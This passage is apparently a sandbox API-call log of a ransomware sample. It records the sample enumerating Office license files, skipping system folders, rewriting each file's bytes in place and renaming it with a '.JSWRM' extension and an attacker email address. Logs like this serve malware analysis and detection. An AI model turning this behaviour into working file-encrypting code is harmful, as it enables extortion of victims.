Office\\root\\Licenses16\\PublisherR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publisherr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0109.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0109.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0109.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0109.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0109.691] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xead3ce9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xead3ce9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeae943d9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a8d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="PU41D2~1.XRM")) returned 1 [0109.691] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0109.691] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0109.691] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0109.691] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0109.691] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.691] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.691] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.691] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.691] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.691] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0109.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0109.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0109.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0109.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0109.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0109.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0109.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0109.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0109.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0109.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0109.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.692] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6797) returned 1 [0109.692] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a80) returned 0x205850 [0109.692] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a80, lpOverlapped=0x0) returned 1 [0109.694] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.694] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a80, lpOverlapped=0x0) returned 1 [0109.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0109.694] CloseHandle (hObject=0x45c) returned 1 [0109.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0109.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0109.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0109.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0109.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0109.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0109.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.695] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0109.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0109.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0109.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.696] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac7e2dd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeac7e2dd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeae47f1f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="PU5440~1.XRM")) returned 1 [0109.696] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.696] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.696] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.696] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.696] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.696] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.696] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.696] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.696] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.696] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0109.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0109.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0109.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0109.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0109.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0109.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0109.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0109.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0109.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0109.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0109.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.697] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11629) returned 1 [0109.697] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0109.697] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0109.699] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.699] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0109.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.700] CloseHandle (hObject=0x45c) returned 1 [0109.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0109.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0109.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0109.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0109.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0109.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0109.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.700] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0109.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0109.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0109.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.701] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeab4cfd7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeab4cfd7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xead3ce9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2595, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherVL_KMS_Client-ul.xrm-ms", cAlternateFileName="PU81B2~1.XRM")) returned 1 [0109.701] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0109.701] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0109.701] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0109.701] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0109.701] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned -1 [0109.702] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned 1 [0109.702] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0109.702] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.702] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0109.702] lstrcmpiW (lpString1="PublisherVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0109.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0109.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ul.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ul.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0109.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0109.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ul.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_KMS_Client-ul.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0109.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0109.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0109.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0109.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.703] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9621) returned 1 [0109.703] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2590) returned 0x24c1d0 [0109.703] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2590, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2590, lpOverlapped=0x0) returned 1 [0109.705] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.705] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2590, lpOverlapped=0x0) returned 1 [0109.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.705] CloseHandle (hObject=0x45c) returned 1 [0109.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0109.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, 